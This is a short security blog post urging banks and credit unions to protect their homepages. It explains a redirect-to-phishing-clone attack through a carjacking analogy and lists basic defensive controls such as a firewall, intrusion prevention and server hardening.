Most financial institutions invest a large portion of their security budgets to protect their software-as-a-service (SaaS) applications. They correctly perceive that many cybercriminals look for opportunities where software vendors call, send, or receive valuable data from the institution, and try to make that process as secure as possible. That said they often totally miss the boat on a very different, but sometimes equally juicy target; their own homepages. Institutional homepages play a critical role in directing traffic, and are a major target for cybercriminals. Yet, many financial institutions spend little to no resources protecting their homepages with adequate security controls. So, what does this type of crime look and why is it important to protect your homepage?
Well, imagine that you’re a tourist driving in your brand new Mercedes Benz CL in downtown Manhattan, not certain of your destination. When you reach an intersection, you encounter a police officer directing traffic in the middle of the road. The officer asks you to take a detour. After driving for a few minutes, you hit a construction blockade, and suddenly a man with a gun comes up to the driver’s window from behind your car and forces you out. In the car, you have an unencrypted laptop containing sensitive customer information that is worth millions of dollars on the black market. As the criminal drives away with your car and your customer information, you realize that the police officer at the intersection was a criminal in disguise. You were duped. Game over!
Likewise, a bank or credit union’s homepage can be compromised and modified to redirect unsuspecting customers to an identical site that collected usernames, passwords, and security questions. The hacker can then use those credentials to log into the legitimate site and access bank account numbers, credit card histories, and other sensitive (and valuable) information. This type of attack is called a “man-in-the-middle attack.”
Insufficient security investment for protecting your homepage can leave your institution vulnerable to a massive short-term hit to your bottom line and even worse long-term damage to your institution’s credibility. At minimum, your homepage should have the following controls:
- An intrusion prevention system (IPS) where attacks are detected and responded to in real-time
- A firewall
- Host-based logging and monitoring
- Hardened web server according to best practices; see http://cisecurity.org/
Protecting your homepage is just as important as protecting your SaaS applications. If you’re a bank or credit union, make sure your IT team is thinking about homepage security too!
Original Post: http://blog.andera.com/posts/2012/october/why-protecting-your-homepage-is-no-laughing-matter.aspx